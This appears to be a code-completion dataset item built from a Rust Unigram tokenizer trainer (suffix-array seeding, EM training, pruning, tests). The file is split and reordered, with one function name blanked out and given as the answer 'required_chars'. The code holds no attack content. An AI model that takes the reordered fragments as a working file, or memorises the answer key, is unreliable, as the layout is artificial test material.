        .for_each(|(_, score)| *score = score.ln() - log_total);
}
/// A `UnigramTrainer` can train a `Unigram` model from `word_counts`.
#[non_exhaustive]
#[derive(Builder, Debug, Clone, Serialize, Deserialize)]
pub struct UnigramTrainer {
#[builder(default = "true")]
pub show_progress: bool,
#[builder(default = "8000")]
pub vocab_size: u32,
#[builder(default = "2")]
pub n_sub_iterations: u32,
#[builder(default = "0.75")]
pub shrinking_factor: f64,
#[builder(default = "vec![]")]
pub special_tokens: Vec<AddedToken>,
#[builder(default = "HashSet::new()")]
pub initial_alphabet: HashSet<char>,
#[builder(default = "None")]
pub unk_token: Option<String>,
#[builder(default = "16")]
pub max_piece_length: usize,
#[builder(default = "1_000_000")]
seed_size: usize,
#[builder(default = "HashMap::new()")]
words: HashMap<String, u32>,
}
impl Default for UnigramTrainer {
fn default() -> Self {
Self::builder().build().unwrap()
}
}
impl UnigramTrainer {
pub fn builder() -> UnigramTrainerBuilder {
UnigramTrainerBuilder::default()
}
/// Setup a progress bar if asked to show progress
fn setup_progress(&self) -> Option<ProgressBar> {
if self.show_progress {
let p = ProgressBar::new(0);
p.set_style(
ProgressStyle::default_bar()
.template("[{elapsed_precise}] {msg:<40!} {wide_bar} {pos:<9!}/{len:>9!}"),
);
Some(p)
} else {
None
}
}
fn is_valid_sentencepiece(&self, char_string: &[char]) -> bool {
// Checks string length
// Space not in the substring, numbers, hiragana and more should be taken
// care of within pre_tokenizers.
// https://github.com/google/sentencepiece/blob/26be9516cd81d5315ee31c48d2438018e0eab879/src/trainer_interface.cc#L203
let n = char_string.len();
if char_string.is_empty() || n > self.max_piece_length {
return false;
}
true
}
fn finalize(&self, model: Unigram, required_chars: HashSet<String>) -> Result<Unigram> {
let mut min_score_penalty = 0.0;
let min_score_penalty_delta = 0.0001;
let mut pieces: Vec<(String, f64)> = vec![];
let mut inserted: HashSet<String> = HashSet::new();
// We don't want to include the <UNK> that was used to train
inserted.insert("<UNK>".into());
let existing_pieces: HashMap<String, f64> = model.iter().cloned().collect();
for c in required_chars {
if let Some(t) = existing_pieces.get(&c) {
inserted.insert(c.clone());
pieces.push((c, *t));
} else {
let score = model.min_score + min_score_penalty;
inserted.insert(c.clone());
pieces.push((c, score));
min_score_penalty += min_score_penalty_delta;
}
}
let (unk_id, need_add_unk) = if let Some(ref unk) = self.unk_token {
let unk_id = self.special_tokens.iter().enumerate().find_map(|(i, t)| {
if t.content == *unk {
Some(i)
} else {
None
}
});
match unk_id {
Some(id) => (Some(id), false),
None => (Some(0), true),
}
} else {
(None, false)
};
let vocab_size_without_special_tokens = if need_add_unk {
self.vocab_size as usize - self.special_tokens.len() - 1
} else {
self.vocab_size as usize - self.special_tokens.len()
};
for (token, score) in model.iter() {
if inserted.contains::<str>(token) {
continue;
}
inserted.insert(token.to_string());
pieces.push((token.to_string(), if score.is_nan() { 0.0 } else { *score }));
if pieces.len() == vocab_size_without_special_tokens {
break;
}
}
pieces.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
// Insert the necessary tokens
let mut special_tokens = self
.special_tokens
.iter()
.map(|t| (t.content.clone(), 0.0))
.collect::<Vec<_>>();
if need_add_unk {
special_tokens.insert(0, (self.unk_token.clone().unwrap(), 0.0));
}
Unigram::from(
special_tokens.into_iter().chain(pieces).collect(),
unk_id,
model.byte_fallback(),
)
}
fn | (&self, word_counts: &[Sentence]) -> HashSet<String> {
word_counts
.iter()
.flat_map(|(s, _count)| s.chars())
.chain(self.initial_alphabet.iter().copied())
.map(|c| c.to_string())
.collect()
}
fn make_seed_sentence_pieces(
&self,
sentences: &[Sentence],
_progress: &Option<ProgressBar>,
) -> Vec<SentencePiece> {
// Put all sentences in a string, separated by \0
let total: usize = sentences
.iter()
.map(|(s, _)| s.chars().count())
.sum::<usize>()
+ sentences.len();
let mut flat_string = String::with_capacity(total);
let mut all_chars: HashMap<char, u32> = HashMap::new();
let c_sentence_boundary = '\0';
let k_sentence_boundary = '\0'.to_string();
for (string, n) in sentences {
if string.is_empty() {
continue;
}
flat_string.push_str(string);
// XXX
// Comment suggests we add sentence boundary, but it seems to be missing from actual
// code in spm.
flat_string.push_str(&k_sentence_boundary);
for c in string.chars() {
if c != c_sentence_boundary {
*all_chars.entry(c).or_insert(0) += n;
}
}
}
flat_string.shrink_to_fit();
#[cfg(feature = "esaxx_fast")]
let suffix = esaxx_rs::suffix(&flat_string).unwrap();
#[cfg(not(feature = "esaxx_fast"))]
let suffix = esaxx_rs::suffix_rs(&flat_string).unwrap();
// Basic chars need to be in sentence pieces.
let mut seed_sentencepieces: Vec<SentencePiece> = vec![];
let mut sall_chars: Vec<_> = all_chars.into_iter().map(|(a, b)| (b, a)).collect();
// Reversed order
sall_chars.sort_by_key(|&a| Reverse(a));
let mut substr_index: Vec<_> = suffix
.iter()
.filter_map(|(string, freq)| {
if string.len() <= 1 {
return None;
}
if string.contains(&c_sentence_boundary) {
return None;
}
if !self.is_valid_sentencepiece(string) {
return None;
}
let score = freq * string.len() as u32;
// if let Some(p) = &progress {
// p.inc(1);
// }
Some((score, string))
})
.collect();
// Fill seed_sentencepieces
for (count, character) in sall_chars {
seed_sentencepieces.push((character.to_string(), count.into()));
}
// sort by decreasing score
substr_index.sort_by_key(|&a| Reverse(a));
for (score, char_string) in substr_index {
// Just in case
assert!(self.is_valid_sentencepiece(char_string));
let string: String = char_string.iter().collect();
seed_sentencepieces.push((string, score.into()));
if seed_sentencepieces.len() >= self.seed_size {
break;
}
}
to_log_prob(&mut seed_sentencepieces);
seed_sentencepieces
}
fn prune_sentence_pieces(
&self,
model: &Unigram,
pieces: &[SentencePiece],
sentences: &[Sentence],
) -> Vec<SentencePiece> {
let mut always_keep = vec![true; pieces.len()];
let mut alternatives: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
let bos_id = pieces.len() + 1;
let eos_id = pieces.len() + 2;
// First, segments the current sentencepieces to know
// how each sentencepiece is resegmented if this sentencepiece is removed
// from the vocabulary.
// To do so, we take the second best segmentation of sentencepiece[i].
// alternatives[i] stores the sequence of second best sentencepieces.
for (id, (token, _score)) in pieces.iter().enumerate() {
// Always keep unk.
if id == 0 {
always_keep[id] = false;
continue;
}
let mut lattice = Lattice::from(token, bos_id, eos_id);
model.populate_nodes(&mut lattice);
let nbests = lattice.nbest(2);
if nbests.len() == 1 {
always_keep[id] = true;
} else if nbests[0].len() >= 2 {
always_keep[id] = false;
} else if nbests[0].len() == 1 {
always_keep[id] = true;
for node in &nbests[1] {
let alt_id = node.borrow().id;
alternatives[id].push(alt_id);
}
}
}
// Second, segments all sentences to compute likelihood
// with a unigram language model. inverted[i] stores
// the set of sentence index where the sentencepieces[i] appears.
let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
let indexed_sentences: Vec<(usize, &Sentence)> = sentences.iter().enumerate().collect();
let collected: (f64, Vec<f64>, Vec<Vec<usize>>) = indexed_sentences
.maybe_par_chunks(chunk_size)
.map(|enumerated_sentence_count_chunk| {
let mut vsum = 0.0;
let mut freq: Vec<f64> = vec![0.0; pieces.len()];
let mut inverted: Vec<Vec<usize>> = vec![Vec::new(); pieces.len()];
for (i, (sentence, count)) in enumerated_sentence_count_chunk {
let mut lattice = Lattice::from(sentence, bos_id, eos_id);
model.populate_nodes(&mut lattice);
vsum += *count as f64;
for node_ref in lattice.viterbi() {
let id = node_ref.borrow().id;
freq[id] += *count as f64;
inverted[id].push(*i);
}
}
(vsum, freq, inverted)
})
.reduce(
|| (0.0, vec![0.0; pieces.len()], vec![Vec::new(); pieces.len()]),
|(vsum, freq, inverted), (lvsum, lfreq, linverted)| {
(
vsum + lvsum,
freq.iter()
.zip(lfreq)
.map(|(global_el, local_el)| global_el + local_el)
.collect(),
inverted
.iter()
.zip(linverted)
.map(|(global_el, local_el)| [&global_el[..], &local_el[..]].concat())
.collect(),
)
},
);
let (vsum, freq, inverted) = collected;
let sum: f64 = freq.iter().sum();
let logsum = sum.ln();
let mut candidates: Vec<(usize, f64)> = vec![];
let mut new_pieces: Vec<SentencePiece> = Vec::with_capacity(self.vocab_size as usize);
new_pieces.push(pieces[0].clone());
// Finally, computes how likely the LM likelihood is reduced if
// the sentencepiece[i] is removed from the vocabulary.
// Since the exact computation of loss is difficult, we compute the
// loss approximately by assuming that all sentencepiece[i] in the sentences
// are replaced with alternatives[i] when sentencepiece[i] is removed.
for (id, (token, score)) in pieces.iter().enumerate() {
if id == 0 {
continue;
}
if freq[id] == 0.0 && !always_keep[id] {
// not found in Viterbi path. Can remove this entry safely.
continue;
} else if alternatives[id].is_empty() {
// no alternatives. Keeps this entry.
new_pieces.push((token.to_string(), *score));
} else {
let mut f = 0.0; // the frequency of pieces[i];
for n in &inverted[id] {
let score = sentences[*n].1 as f64;
f += score;
}
// TODO: Temporary hack to avoid Nans.
if f == 0.0 || f.is_nan() {
// new_pieces.push((token.to_string(), *score));
continue;
}
f /= vsum; // normalizes by all sentence frequency.
let logprob_sp = freq[id].ln() - logsum;
// After removing the sentencepiece[i], its frequency freq[i] is
// re-assigned to alternatives.
// new_sum = current_sum - freq[i] + freq[i] * alternatives.size()
// = current_sum + freq[i] (alternatives - 1)
let logsum_alt = (sum + freq[id] * (alternatives.len() - 1) as f64).ln();
// The frequencies of altenatives are increased by freq[i].
let mut logprob_alt = 0.0;
for n in &alternatives[id] {
logprob_alt += (freq[*n] + freq[id]).ln() - logsum_alt;
}
// loss: the diff of likelihood after removing the sentencepieces[i].
let loss = f * (logprob_sp - logprob_alt);
if loss.is_nan() {
panic!("");
}
candidates.push((id, loss));
}
}
let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
let pruned_size: usize = ((pieces.len() as f64) * self.shrinking_factor) as usize;
let pruned_size = desired_vocab_size.max(pruned_size);
candidates.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
for (id, _score) in candidates {
if new_pieces.len() == pruned_size {
break;
}
new_pieces.push(pieces[id].clone());
}
new_pieces.to_vec()
}
/// Reset the progress bar to a fresh state with the given length and message.
fn update_progress(&self, p: &Option<ProgressBar>, len: usize, message: &str) {
    if let Some(bar) = p.as_ref() {
        let total = len as u64;
        bar.set_message(message);
        bar.set_length(total);
        // Redraw at most ~100 times over the whole run to keep rendering cheap.
        bar.set_draw_delta(total / 100);
        bar.reset();
    }
}
/// Put the progress bar into its finished state, pinning its final length.
fn finalize_progress(&self, p: &Option<ProgressBar>, final_len: usize) {
    if let Some(bar) = p.as_ref() {
        bar.set_length(final_len as u64);
        bar.finish();
        // Move to the next line so later output does not overwrite the bar.
        println!();
    }
}
/// E step of the EM loop: computes, for every piece, its expected frequency
/// over all sentences under the current model.
///
/// Returns `(objective, num_tokens, expected)` where `objective` is the
/// negated, frequency-normalized log-likelihood, `num_tokens` counts tokens
/// on the Viterbi paths, and `expected[i]` is the expected count of piece `i`.
fn run_e_step(&self, model: &Unigram, sentences: &[Sentence]) -> (f64, u32, Vec<f64>) {
    let all_sentence_freq: u32 = sentences.iter().map(|(_a, b)| *b).sum();
    // One chunk per thread (at least one sentence per chunk).
    let chunk_size = std::cmp::max(sentences.len() / current_num_threads(), 1);
    let collected: (f64, u32, Vec<f64>) = sentences
        .maybe_par_chunks(chunk_size)
        .map(|sentences_chunk| {
            let mut expected: Vec<f64> = vec![0.0; model.len()];
            let mut objs: f64 = 0.0;
            let mut ntokens: u32 = 0;
            for (string, freq) in sentences_chunk {
                // Build the segmentation lattice for this sentence and let the
                // model score every candidate piece inside it.
                let mut lattice = Lattice::from(string, model.bos_id, model.eos_id);
                model.populate_nodes(&mut lattice);
                // `z` is the log partition; marginals accumulate into `expected`.
                let z: f64 = lattice.populate_marginal(*freq as f64, &mut expected);
                if z.is_nan() {
                    panic!("likelihood is NAN. Input sentence may be too long.");
                }
                ntokens += lattice.viterbi().len() as u32;
                objs -= z / (all_sentence_freq as f64);
            }
            (objs, ntokens, expected)
        })
        .reduce(
            // Identity element for the parallel reduction.
            || (0.0, 0, vec![0.0; model.len()]),
            |(objs, ntokens, expected), (lobjs, lntokens, lexpected)| {
                (
                    objs + lobjs,
                    ntokens + lntokens,
                    // Element-wise sum of the per-chunk expectations.
                    expected
                        .iter()
                        .zip(lexpected)
                        .map(|(global_el, local_el)| global_el + local_el)
                        .collect(),
                )
            },
        );
    collected
}
/// M step of the EM loop: converts expected frequencies from the E step into
/// new piece scores, dropping pieces whose expected count is below threshold.
///
/// Panics if `pieces` and `expected` differ in length.
fn run_m_step(&self, pieces: &[SentencePiece], expected: &[f64]) -> Vec<SentencePiece> {
    if pieces.len() != expected.len() {
        panic!(
            "Those two iterators are supposed to be the same length ({} vs {})",
            pieces.len(),
            expected.len()
        );
    }
    let mut new_pieces: Vec<SentencePiece> =
        Vec::with_capacity(self.vocab_size.try_into().unwrap());
    let mut sum = 0.0;
    // Pieces expected to appear less than this are pruned outright.
    let expected_frequency_threshold = 0.5;
    for (i, (freq, (piece, _score))) in expected.iter().zip(pieces).enumerate() {
        // Always keep unk.
        if i == 0 {
            // NaN marks the unk entry as carrying no real score.
            new_pieces.push((piece.clone(), f64::NAN));
            continue;
        }
        if *freq < expected_frequency_threshold {
            continue;
        }
        new_pieces.push((piece.clone(), *freq));
        sum += freq;
    }
    // // Here we do not use the original EM, but use the
    // // Bayesianified/DPified EM algorithm.
    // // https://cs.stanford.edu/~pliang/papers/tutorial-acl2007-talk.pdf
    // // This modification will act as a sparse prior.
    let logsum = digamma(sum);
    let new_pieces: Vec<_> = new_pieces
        .into_iter()
        .map(|(s, c)| (s, digamma(c) - logsum))
        .collect();
    new_pieces
}
/// Run the full Unigram training pipeline on `sentences`, writing the trained
/// model into `model` and returning the special tokens to add afterwards.
///
/// Steps: seed pieces from frequent substrings, EM refinement with periodic
/// pruning until the vocabulary fits, then finalization to `vocab_size`.
pub fn do_train(
    &self,
    sentences: Vec<Sentence>,
    model: &mut Unigram,
) -> Result<Vec<AddedToken>> {
    let progress = self.setup_progress();
    //
    // 1. Compute frequent substrings
    // TODO Should be able to upgrade to u64 when needed
    self.update_progress(&progress, sentences.len(), "Suffix array seeds");
    let mut pieces: Vec<SentencePiece> =
        Vec::with_capacity(self.vocab_size.try_into().unwrap());
    // We use a UNK token when training, whatever the `self.unk_token`
    pieces.push(("<UNK>".into(), f64::NAN));
    pieces.extend(self.make_seed_sentence_pieces(&sentences, &progress));
    self.finalize_progress(&progress, sentences.len());
    // Useful to check compatibility with spm.
    debug!(
        "Using {} pieces on {} sentences for EM training",
        pieces.len(),
        sentences.len()
    );
    let desired_vocab_size: usize = (self.vocab_size as usize * 11) / 10; // * 1.1
    // 2. Run E-M Loops to fine grain the pieces.
    // We will shrink the vocab by shrinking_factor every loop on average
    // Some other pieces are dropped if logprob is too small
    // V = N * (f)**k
    // k = log(V / N) / log(f)
    let expected_loops = (((desired_vocab_size as f64).ln() - (pieces.len() as f64).ln())
        / self.shrinking_factor.ln()) as usize
        + 1;
    let expected_updates = expected_loops * self.n_sub_iterations as usize;
    self.update_progress(&progress, expected_updates, "EM training");
    // Every distinct char must fit in the vocabulary, or training cannot succeed.
    let required_chars = self.required_chars(&sentences);
    if required_chars.len() as u32 > self.vocab_size {
        return Err(Box::new(UnigramTrainerError::VocabularyTooSmall));
    }
    let mut new_model = Unigram::from(pieces.clone(), Some(0), false)?;
    loop {
        // Sub-EM iteration.
        for _iter in 0..self.n_sub_iterations {
            // Executes E step
            let (_objective, _num_tokens, expected) = self.run_e_step(&new_model, &sentences);
            // Executes M step.
            pieces = self.run_m_step(&pieces, &expected);
            new_model = Unigram::from(pieces.clone(), Some(0), false)?;
            // Useful comment for checking compatibility with spm
            // NOTE(review): the ratio below divides by `model.len()` (the
            // caller-provided output model, still untrained at this point)
            // rather than `new_model.len()` — confirm this debug metric is
            // intended.
            debug!(
                "Em iter={} size={} obj={} num_tokens={} num_tokens/piece={}",
                _iter,
                new_model.len(),
                _objective,
                _num_tokens,
                _num_tokens as f64 / model.len() as f64
            );
            if let Some(p) = &progress {
                p.inc(1);
            }
        } // end of Sub EM iteration
        // Stops the iteration when the size of sentences reaches to the
        // desired symbol size.
        if pieces.len() <= desired_vocab_size {
            break;
        }
        // Prunes pieces.
        pieces = self.prune_sentence_pieces(&new_model, &pieces, &sentences);
        new_model = Unigram::from(pieces.clone(), Some(0), false)?;
    }
    self.finalize_progress(&progress, expected_updates);
    // Finally, adjusts the size of sentencepices to be |vocab_size|.
    *model = self.finalize(new_model, required_chars)?;
    Ok(self.special_tokens.clone())
}
}
impl Trainer for UnigramTrainer {
    type Model = Unigram;
    /// Train a Unigram model
    fn train(&self, model: &mut Unigram) -> Result<Vec<AddedToken>> {
        // Materialize the word counts accumulated by `feed` into sentences.
        let sentences: Vec<_> = self.words.iter().map(|(s, i)| (s.to_owned(), *i)).collect();
        self.do_train(sentences, model)
    }
    /// Whether we should show progress
    fn should_show_progress(&self) -> bool {
        self.show_progress
    }
    /// Accumulate word counts from the (possibly parallel) input sequences,
    /// after running each sequence through `process` (pre-tokenization).
    fn feed<I, S, F>(&mut self, iterator: I, process: F) -> Result<()>
    where
        I: Iterator<Item = S> + Send,
        S: AsRef<str> + Send,
        F: Fn(&str) -> Result<Vec<String>> + Sync,
    {
        let words: Result<HashMap<String, u32>> = iterator
            .maybe_par_bridge()
            .map(|sequence| {
                // Per-sequence local counts, merged in the reduce below.
                let words = process(sequence.as_ref())?;
                let mut map = HashMap::new();
                for word in words {
                    map.entry(word).and_modify(|c| *c += 1).or_insert(1);
                }
                Ok(map)
            })
            .reduce(
                || Ok(HashMap::new()),
                |acc, ws| {
                    // Any Err short-circuits via `?` on both operands.
                    let mut acc = acc?;
                    for (k, v) in ws? {
                        acc.entry(k).and_modify(|c| *c += v).or_insert(v);
                    }
                    Ok(acc)
                },
            );
        self.words = words?;
        Ok(())
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    use assert_approx_eq::assert_approx_eq;
    use std::iter::FromIterator;
    // Seed-piece extraction: single chars plus frequent substrings, with
    // scores matching the values produced by sentencepiece.
    #[test]
    fn test_unigram_chars() {
        let trainer = UnigramTrainerBuilder::default()
            .show_progress(false)
            .build()
            .unwrap();
        let sentences = vec![
            ("This is a".to_string(), 1),
            ("こんにちは友達".to_string(), 1),
        ];
        let required_chars = trainer.required_chars(&sentences);
        assert_eq!(required_chars.len(), 13);
        let progress = None;
        let table = trainer.make_seed_sentence_pieces(&sentences, &progress);
        let target_strings = vec![
            "s", "i", " ", "達", "友", "ん", "は", "に", "ち", "こ", "h", "a", "T", "is ", "s ",
        ];
        let strings: Vec<_> = table.iter().map(|(string, _)| string).collect();
        assert_eq!(strings, target_strings);
        let scores = table.iter().map(|(_, score)| score);
        // Expected log-probabilities; the trailing comment is the raw count.
        let target_scores = vec![
            -2.5649493574615367, // 2.0
            -2.5649493574615367, // 2.0
            -2.5649493574615367, // 2.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -3.258096538021482,  // 1.0
            -1.4663370687934272, // 6.0
            -1.8718021769015916, // 4.0
        ];
        for (score, target_score) in scores.zip(target_scores) {
            assert_approx_eq!(*score, target_score, 0.01);
        }
    }
    // The configured initial alphabet must be merged into the required chars.
    #[test]
    fn test_initial_alphabet() {
        let trainer = UnigramTrainerBuilder::default()
            .show_progress(false)
            .initial_alphabet(HashSet::from_iter(vec!['a', 'b', 'c', 'd', 'e', 'f']))
            .build()
            .unwrap();
        let sentences = vec![("こんにちは友達".to_string(), 1)];
        let required_chars = trainer.required_chars(&sentences);
        assert_eq!(
            required_chars,
            vec!["こ", "ん", "に", "ち", "は", "友", "達", "a", "b", "c", "d", "e", "f"]
                .into_iter()
                .map(|s| s.to_owned())
                .collect::<HashSet<_>>()
        );
    }
    // Placement rules for the unk token in the finalized vocabulary.
    #[test]
    fn test_unk_token() {
        // 1. Should add `unk_token` as first special token
        let trainer = UnigramTrainerBuilder::default()
            .show_progress(false)
            .special_tokens(vec![
                AddedToken::from("[SEP]", true),
                AddedToken::from("[CLS]", true),
            ])
            .unk_token(Some("[UNK]".into()))
            .build()
            .unwrap();
        let mut unigram = Unigram::default();
        trainer
            .do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
            .unwrap();
        let mut pieces = unigram.iter();
        assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
        assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
        assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
        // 2. Let it where it is
        let trainer = UnigramTrainerBuilder::default()
            .show_progress(false)
            .special_tokens(vec![
                AddedToken::from("[SEP]", true),
                AddedToken::from("[CLS]", true),
                AddedToken::from("[UNK]", true),
            ])
            .unk_token(Some("[UNK]".into()))
            .build()
            .unwrap();
        let mut unigram = Unigram::default();
        trainer
            .do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
            .unwrap();
        let mut pieces = unigram.iter();
        assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
        assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
        assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
        // 3. Don't put it there if not needed
        let trainer = UnigramTrainerBuilder::default()
            .show_progress(false)
            .build()
            .unwrap();
        let mut unigram = Unigram::default();
        trainer
            .do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
            .unwrap();
        let mut pieces = unigram.iter();
        assert_eq!(pieces.next().unwrap().0, "e".to_string());
    }
    // Special tokens must come first in the finalized vocabulary.
    #[test]
    fn test_special_tokens() {
        let trainer = UnigramTrainerBuilder::default()
            .show_progress(false)
            .special_tokens(vec![
                AddedToken::from("[SEP]", true),
                AddedToken::from("[CLS]", true),
            ])
            .build()
            .unwrap();
        let mut unigram = Unigram::default();
        trainer
            .do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
            .unwrap();
        let mut pieces = unigram.iter();
        assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
        assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
    }
    // Raw scores are normalized to ln(score) - ln(sum).
    #[test]
    fn test_to_log_prob() {
        let mut a = vec![("".to_string(), 1.0), ("".to_string(), 2.0)];
        to_log_prob(&mut a);
        let scores = a.iter().map(|(_, score)| *score).collect::<Vec<_>>();
        // ln(1) - ln(3)
        assert_approx_eq!(scores[0], -1.098, 0.01);
        // ln(2) - ln(3)
        assert_approx_eq!(scores[1], -0.405, 0.01);
    }
}
| required_chars | identifier_name |
trainer.rs | use crate::models::unigram::{lattice::Lattice, model::Unigram};
use crate::tokenizer::{AddedToken, Result, Trainer};
use crate::utils::parallelism::*;
use crate::utils::progress::{ProgressBar, ProgressStyle};
use log::debug;
use serde::{Deserialize, Serialize};
use std::cmp::Reverse;
use std::collections::{HashMap, HashSet};
use std::convert::TryInto;
// A token and a score
type SentencePiece = (String, f64);
// A full sentence or word + it's count within the dataset
type Sentence = (String, u32);
/// Approximation of the digamma function ψ(x), matching sentencepiece's
/// implementation: shift the argument above 7 via the recurrence
/// ψ(x) = ψ(x + 1) - 1/x, then evaluate an asymptotic series around x - 1/2.
fn digamma(mut x: f64) -> f64 {
    // Recurrence step: each shift of +1 subtracts 1/x from the result.
    let mut acc = 0.0;
    while x < 7.0 {
        acc -= 1.0 / x;
        x += 1.0;
    }
    // Asymptotic expansion in inverse powers of (x - 1/2).
    x -= 1.0 / 2.0;
    let inv = 1.0 / x;
    let inv2 = inv * inv;
    let inv4 = inv2 * inv2;
    acc + x.ln() + (1.0 / 24.0) * inv2 - 7.0 / 960.0 * inv4 + (31.0 / 8064.0) * inv4 * inv2
        - (127.0 / 30720.0) * inv4 * inv4
}
/// Errors that can occur while training a Unigram model.
#[derive(thiserror::Error, Debug)]
pub enum UnigramTrainerError {
    /// Returned when `vocab_size` is smaller than the number of distinct
    /// required characters found in the training data.
    #[error("The vocabulary is not large enough to contain all chars")]
    VocabularyTooSmall,
}
/// Normalize raw scores in place into log-probabilities: each score becomes
/// ln(score) - ln(sum of all scores).
fn to_log_prob(pieces: &mut [SentencePiece]) {
    let total: f64 = pieces.iter().map(|(_, score)| score).sum();
    let log_total = total.ln();
    pieces
        .iter_mut()
        .for_each(|(_, score)| *score = score.ln() - log_total);
}
/// A `UnigramTrainer` can train a `Unigram` model from `word_counts`.
#[non_exhaustive]
#[derive(Builder, Debug, Clone, Serialize, Deserialize)]
pub struct UnigramTrainer {
    /// Whether to display a progress bar during training.
    #[builder(default = "true")]
    pub show_progress: bool,
    /// Target size of the final vocabulary, special tokens included.
    #[builder(default = "8000")]
    pub vocab_size: u32,
    /// Number of EM sub-iterations run between pruning rounds.
    #[builder(default = "2")]
    pub n_sub_iterations: u32,
    /// Fraction of pieces kept at each pruning round.
    #[builder(default = "0.75")]
    pub shrinking_factor: f64,
    /// Special tokens prepended to the final vocabulary.
    #[builder(default = "vec![]")]
    pub special_tokens: Vec<AddedToken>,
    /// Characters forced into the vocabulary even if absent from the data.
    #[builder(default = "HashSet::new()")]
    pub initial_alphabet: HashSet<char>,
    /// Token to use for unknown pieces, if any.
    #[builder(default = "None")]
    pub unk_token: Option<String>,
    /// Maximum length, in characters, of a candidate sentence piece.
    #[builder(default = "16")]
    pub max_piece_length: usize,
    // Maximum number of seed pieces generated from the suffix array.
    #[builder(default = "1_000_000")]
    seed_size: usize,
    // Word counts accumulated by `feed`, consumed by `train`.
    #[builder(default = "HashMap::new()")]
    words: HashMap<String, u32>,
}
impl Default for UnigramTrainer {
    /// Default trainer built from the builder's default field values.
    fn default() -> Self {
        Self::builder().build().unwrap()
    }
}
impl UnigramTrainer {
/// Create a `UnigramTrainerBuilder` to configure and build a trainer.
pub fn builder() -> UnigramTrainerBuilder {
    UnigramTrainerBuilder::default()
}
/// Build a progress bar when `show_progress` is enabled, `None` otherwise.
fn setup_progress(&self) -> Option<ProgressBar> {
    if !self.show_progress {
        return None;
    }
    let bar = ProgressBar::new(0);
    bar.set_style(
        ProgressStyle::default_bar()
            .template("[{elapsed_precise}] {msg:<40!} {wide_bar} {pos:<9!}/{len:>9!}"),
    );
    Some(bar)
}
/// A candidate piece is valid when it is non-empty and at most
/// `max_piece_length` characters long. Spaces, numbers, scripts and the like
/// are expected to have been handled by pre-tokenizers.
/// https://github.com/google/sentencepiece/blob/26be9516cd81d5315ee31c48d2438018e0eab879/src/trainer_interface.cc#L203
fn is_valid_sentencepiece(&self, char_string: &[char]) -> bool {
    let n = char_string.len();
    (1..=self.max_piece_length).contains(&n)
}
/// Build the final vocabulary of at most `vocab_size` entries: required
/// characters first (unseen ones get a score just below the model minimum,
/// decreasing per char), then the best trained pieces, then the configured
/// special tokens, inserting the unk token at index 0 if it was configured
/// but is not already among the special tokens.
fn finalize(&self, model: Unigram, required_chars: HashSet<String>) -> Result<Unigram> {
    let mut min_score_penalty = 0.0;
    let min_score_penalty_delta = 0.0001;
    let mut pieces: Vec<(String, f64)> = vec![];
    let mut inserted: HashSet<String> = HashSet::new();
    // We don't want to include the <UNK> that was used to train
    inserted.insert("<UNK>".into());
    let existing_pieces: HashMap<String, f64> = model.iter().cloned().collect();
    for c in required_chars {
        if let Some(t) = existing_pieces.get(&c) {
            // The char already has a trained score: keep it as-is.
            inserted.insert(c.clone());
            pieces.push((c, *t));
        } else {
            // Unseen char: score slightly below the model minimum, with a
            // growing penalty so repeated insertions stay ordered.
            let score = model.min_score + min_score_penalty;
            inserted.insert(c.clone());
            pieces.push((c, score));
            min_score_penalty += min_score_penalty_delta;
        }
    }
    // Locate the unk token among the special tokens; if configured but
    // absent, it will be inserted at index 0 below (`need_add_unk`).
    let (unk_id, need_add_unk) = if let Some(ref unk) = self.unk_token {
        let unk_id = self.special_tokens.iter().enumerate().find_map(|(i, t)| {
            if t.content == *unk {
                Some(i)
            } else {
                None
            }
        });
        match unk_id {
            Some(id) => (Some(id), false),
            None => (Some(0), true),
        }
    } else {
        (None, false)
    };
    // Reserve room for the special tokens (and the extra unk if needed).
    let vocab_size_without_special_tokens = if need_add_unk {
        self.vocab_size as usize - self.special_tokens.len() - 1
    } else {
        self.vocab_size as usize - self.special_tokens.len()
    };
    for (token, score) in model.iter() {
        if inserted.contains::<str>(token) {
            continue;
        }
        inserted.insert(token.to_string());
        // NaN scores (the training-time unk placeholder) are mapped to 0.0.
        pieces.push((token.to_string(), if score.is_nan() { 0.0 } else { *score }));
        if pieces.len() == vocab_size_without_special_tokens {
            break;
        }
    }
    // Sort by decreasing score.
    pieces.sort_by(|(_, a), (_, b)| b.partial_cmp(a).unwrap());
    // Insert the necessary tokens
    let mut special_tokens = self
        .special_tokens
        .iter()
        .map(|t| (t.content.clone(), 0.0))
        .collect::<Vec<_>>();
    if need_add_unk {
        special_tokens.insert(0, (self.unk_token.clone().unwrap(), 0.0));
    }
    Unigram::from(
        special_tokens.into_iter().chain(pieces).collect(),
        unk_id,
        model.byte_fallback(),
    )
}
/// Collect every character appearing in the corpus, plus the configured
/// initial alphabet, each as its own single-char string.
fn required_chars(&self, word_counts: &[Sentence]) -> HashSet<String> {
    let mut chars: HashSet<String> = HashSet::new();
    for (sentence, _count) in word_counts {
        chars.extend(sentence.chars().map(|c| c.to_string()));
    }
    chars.extend(self.initial_alphabet.iter().map(|c| c.to_string()));
    chars
}
/// Generate the initial ("seed") pieces: every distinct character, plus the
/// best-scoring frequent substrings found through a suffix array, with scores
/// normalized to log-probabilities at the end.
fn make_seed_sentence_pieces(
    &self,
    sentences: &[Sentence],
